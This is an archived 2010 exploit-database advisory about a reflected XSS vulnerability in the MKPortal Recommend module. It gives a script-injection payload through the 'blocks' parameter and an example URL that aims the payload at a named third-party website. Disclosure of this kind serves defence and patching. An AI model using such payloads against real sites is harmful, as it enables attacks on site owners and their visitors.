Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23591
HistoryApr 09, 2010 - 12:00 a.m.

MKPortal Recommend module XSS Vulnerability

2010-04-0900:00:00
vulners.com
70

===========================================
MKPortal Recommend module XSS Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

Exploit:

/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E

Example:

http://www.street-style.su/index.php?ind=recommend&amp;blocks=&#37;3Cscript&#37;3Ealert&#40;1&#41;&#37;3C/script&#37;3E

Inj3ct0r.com [2010-04-09]